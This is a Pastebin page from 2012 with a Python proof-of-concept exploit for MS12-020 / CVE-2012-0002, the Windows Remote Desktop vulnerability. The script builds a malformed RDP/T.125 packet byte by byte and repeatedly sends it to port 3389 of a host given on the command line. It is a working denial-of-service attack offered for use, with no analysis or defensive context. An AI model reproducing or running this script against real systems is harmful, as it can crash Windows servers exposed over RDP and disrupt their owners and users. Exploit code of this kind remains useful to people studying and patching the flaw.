daily pastebin goal
47%
SHARE
TWEET

MS12-020 / CVE-2012-0002 Vulnerability

a guest Mar 18th, 2012 14,349 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept
  2. # BlackBap.Org
  3.  
  4. import socket
  5. import sys
  6.  
  7.  
  8. buf=""
  9. buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19
  10. buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224
  11. buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470
  12. buf+="\x02\xf0\x80" # ITU-T Rec X.224
  13. buf+="\x7f\x65\x82\x01\x94\x04" #MULTIPOINT-COMMUNICATION-SERVICE T.125
  14.  
  15. buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "Fuck you Chelios" packet
  16. buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
  17. buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
  18. buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
  19. buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
  20. buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
  21. buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
  22. buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
  23. buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
  24. buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
  25. buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
  26. buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
  27. buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
  28. buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
  29. buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
  30. buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
  31. buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
  32. buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
  33. buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
  34. buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
  35. buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
  36. buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
  37. buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
  38. buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
  39. buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
  40. buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
  41. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  42. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  43. buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
  44. buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
  45. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  46. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  47. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  48. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  49. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  50. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  51. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  52. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  53. buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
  54. buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
  55. buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
  56. buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  57. buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  58. buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
  59. buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  60. buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
  61. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  62. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  63. buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
  64. buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
  65. buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
  66. buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
  67. buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
  68. buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
  69. buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
  70. buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
  71. buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
  72. buf+="\xc0"
  73.  
  74. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  75. buf+="\x02\xf0\x80"  # ITU-T Rec X.224
  76. buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125
  77. buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8
  78. buf+="\x02\xf0\x80" # ITU-T Rec X.224
  79. buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125
  80. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  81. buf+="\x02\xf0\x80" # ITU-T Rec X.224
  82. buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125
  83. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  84. buf+="\x02\xf0\x80" #ITU-T Rec X.224
  85. buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125
  86. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  87. buf+="\x02\xf0\x80" #ITU-T Rec X.224
  88. buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125
  89. buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12
  90. buf+="\x02\xf0\x80" #ITU-T Rec X.224
  91. buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125
  92. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  93. buf+="\x02\xf0\x80" #ITU-T Rec X.224
  94. buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125
  95. buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12
  96. buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224
  97.  
  98. HOST = sys.argv[1]
  99. PORT = 3389
  100. for i in range(1000):
  101.  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  102.  s.connect((HOST,PORT))
  103.  print "sending: %d bytes" % len(buf)
  104.  s.send(buf)
  105.  rec = s.recv(100)
  106.  print "received: %d bytes" % len(rec)
  107.  s.close()
  108. # BlackBap.Org
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top